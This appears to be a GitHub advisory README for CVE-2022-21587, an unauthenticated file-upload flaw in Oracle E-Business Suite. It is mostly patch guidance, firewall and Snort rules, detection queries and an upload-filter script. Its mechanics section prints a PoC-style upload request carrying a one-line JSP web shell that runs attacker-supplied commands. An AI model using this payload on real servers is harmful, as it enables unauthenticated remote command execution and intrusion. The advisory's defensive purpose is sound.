# 🚨 **CVE-2022-21587** – Critical Oracle E-Business Suite RCE via unauthenticated file upload! ⚠️
## 🔍 **Quick Facts**
- **CVE ID**: CVE-2022-21587
- **Published**: October 18, 2022
- **Updated**: Last modified May 2023 (NVD)
- **CVSS v3.1 Base Score**: 9.8 (Critical)
- Attack Vector: Network 🌐
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality/Integrity/Availability: High/High/High
- **CWE**: CWE-434 (Unrestricted Upload of File with Dangerous Type)
- **Vendor**: Oracle Corporation
- **Product**: Oracle E-Business Suite
- **Affected Component**: Web Applications Desktop Integrator (Forms)
- **Root Cause**: Improper validation of file uploads in `BneUploaderServlet`
---
## 🔥 **Vulnerability Mechanics**
<img width="802" height="256" alt="uuencoding" src="https://github.com/user-attachments/assets/059d923f-3ce9-498e-9ab4-ec7184dd54fb" />
Attackers send crafted HTTP POST requests to:
```
POST /OA_HTML/BneUploaderServlet HTTP/1.1
```
with malicious `.class` or `.jsp` payloads disguised as legitimate uploads. No login required! 🔓
Example payload snippet (PoC-style):
```http
Content-Disposition: form-data; name="uploadFile"; filename="evil.jsp"
Content-Type: application/octet-stream
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
```
→ Executes arbitrary OS commands on the server 🧨
<img width="1920" height="956" alt="CVE-2022-21587" src="https://github.com/user-attachments/assets/46000759-9a74-42df-9959-f71f635fed1c" />
---
## 🛠️ **Exploitation in the Wild**
- **First Observed**: January 2023
- **CISA KEV Catalog**: Added February 2, 2023 (Deadline: Feb 23, 2023 for FCEB)
- **Threat Actors**:
  - Used in ransomware precursor campaigns
  - Automated scanners (Mirai-like bots, custom Python scripts)
  - Public PoCs on GitHub (search: `CVE-2022-21587 exploit`)
- **Notable Incidents**:
  - Rapid7 MDR: Multiple customer compromises in Feb 2023
  - Shadowserver: Scanning spikes post-disclosure
<img width="899" height="281" alt="Step-1" src="https://github.com/user-attachments/assets/ad89209d-567b-4e3a-bfe1-8374bb3cd2cb" />
---
## 🎯 **Affected Versions** (Unpatched)
| Release | Patched In |
|--------|------------|
| 12.1.1 – 12.1.3 | Oct 2022 CPU |
| 12.2.3 – 12.2.12 | Oct 2022 CPU |
> **Note**: Only systems with **Web Applications Desktop Integrator** enabled are vulnerable.
---
## 🛡️ **Mitigation & Hardening**
<img width="572" height="612" alt="Capture-d--cran-2024-07-19---14 57 29" src="https://github.com/user-attachments/assets/28028741-0458-47b4-b4af-1c78c9b8fec6" />
1. **Apply Patch** ✅
   - Download: [Oracle CPU Oct 2022](https://www.oracle.com/security-alerts/cpuoct2022.html)
   - Patch IDs: `34416369`, `34416370` (per release)
2. **Network Segmentation** 🔒
   ```bash
   # Example: allow the EBS web port only from the internal network, drop everything else
   iptables -A INPUT -p tcp --dport 8000 -s 192.168.0.0/16 -j ACCEPT
   iptables -A INPUT -p tcp --dport 8000 -j DROP
   ```
3. **WAF / IPS Rules** 🛑
   - Block `.jsp`, `.class`, `.jar` in `/OA_HTML/`
   - Signature example (Snort; `$HTTP_PORTS` must include the EBS web port, 8000 in the example above):
   ```
   alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"CVE-2022-21587 Attempt"; flow:to_server,established; content:"BneUploaderServlet"; nocase; http_uri; classtype:web-application-attack; sid:1000001; rev:1;)
   ```
4. **Detection Queries** 🔍
   - **Web Logs** (the filename only shows up here if it is part of the logged URI; access logs do not record the multipart body):
   ```
   *BneUploaderServlet* AND (*.jsp* OR *.class*)
   ```
   - **SIEM**: Look for `POST /OA_HTML/BneUploaderServlet` with `Content-Type: multipart/form-data`
5. **Disable if Unused**
   - Deactivate WebADI via System Administrator responsibility if not needed.
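As an added illustration of the WAF rule in step 3 and the SIEM condition in step 4 (this is example code written for this README, not the PoC scripts in the repository): a small Python inspector that parses a multipart `POST` under `/OA_HTML/`, pulls every `filename=` out of the parts and blocks uploads whose extension is `.jsp`, `.class` or `.jar`. The request builder, the host `ebs.example.internal` and the boundary string are constructed for the example; the check is extension-based, exactly like the WAF item, so it handles case and path prefixes but does not look inside the file.

```python
import re

# Extensions the WAF item in step 3 says to block under /OA_HTML/ (the page's own list).
BLOCKED_EXTENSIONS = (".jsp", ".class", ".jar")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path (query stripped), headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {n.strip().lower(): v.strip() for n, _, v in (l.partition(":") for l in lines[1:])}
    return {"method": method, "path": path.split("?", 1)[0], "headers": headers, "body": body}

def multipart_filenames(content_type, body):
    """Return every filename= parameter found in the multipart/form-data parts."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        return []
    boundary, names = b"--" + match.group(1).encode("latin-1"), []
    for part in body.split(boundary)[1:]:
        if part.strip() in (b"", b"--"):  # preamble or closing delimiter, not a part
            continue
        part_head = part.partition(b"\r\n\r\n")[0]
        names += [n.decode("latin-1") for n in re.findall(rb'filename="([^"]*)"', part_head, re.IGNORECASE)]
    return names

def inspect_upload(raw):
    """Flag a multipart POST under /OA_HTML/ that carries a file with a blocked extension."""
    req = parse_request(raw)
    ctype = req["headers"].get("content-type", "")
    verdict = {"path": req["path"], "filenames": [], "blocked": False, "reason": ""}
    if (req["method"] != "POST" or not req["path"].lower().startswith("/oa_html/")
            or not ctype.lower().startswith("multipart/form-data")):
        return verdict
    verdict["filenames"] = multipart_filenames(ctype, req["body"])
    for name in verdict["filenames"]:
        base = name.replace("\\", "/").rsplit("/", 1)[-1]  # ignore any path prefix
        ext = ("." + base.rsplit(".", 1)[1]).lower() if "." in base else ""  # case-insensitive
        if ext in BLOCKED_EXTENSIONS:
            verdict.update(blocked=True, reason=f"{base!r} has blocked extension {ext}")
            break
    return verdict

def build_request(filename):  # constructed sample traffic, not a capture from a real system
    b = "----constructedBoundary7d1"
    return (f"POST /OA_HTML/BneUploaderServlet HTTP/1.1\r\nHost: ebs.example.internal:8000\r\n"
            f"Content-Type: multipart/form-data; boundary={b}\r\n\r\n--{b}\r\n"
            f'Content-Disposition: form-data; name="uploadFile"; filename="{filename}"\r\n'
            f"Content-Type: application/octet-stream\r\n\r\n<placeholder file body>\r\n--{b}--\r\n").encode("latin-1")
```

`inspect_upload(build_request("..\\evil.JSP"))` returns a blocked verdict, while a `ledger.txt` upload or a plain `GET` to the servlet passes through untouched.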
---
## 🔗 **Official References**
- [NVD – CVE-2022-21587](https://nvd.nist.gov/vuln/detail/CVE-2022-21587)
- [Oracle Security Alert](https://www.oracle.com/security-alerts/cpuoct2022.html#AppendixEBS)
- [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) (Search CVE)
- [Rapid7 Blog – Exploitation Trends](https://www.rapid7.com/blog/post/2023/02/15/cve-2022-21587-oracle-e-business-suite-vulnerability-exploitation/)
---
## ⚡ **Bonus: Quick Health Check Script (Bash)**
```bash
#!/bin/bash
# Reachability check only: a 200 shows the servlet accepts an unauthenticated upload,
# it does not prove the Oct 2022 CPU is missing. Verify the patch IDs listed above as well.
URL="http://your-ebs-host:8000/OA_HTML/BneUploaderServlet"
TMP="$(mktemp)" && echo "health-check" > "$TMP"
CODE="$(curl -s -o /dev/null -w "%{http_code}" -X POST "$URL" -F "uploadFile=@${TMP}")"
rm -f "$TMP"
echo "HTTP ${CODE}"
# Returns 200? → Likely vulnerable (pre-patch behavior)
```
---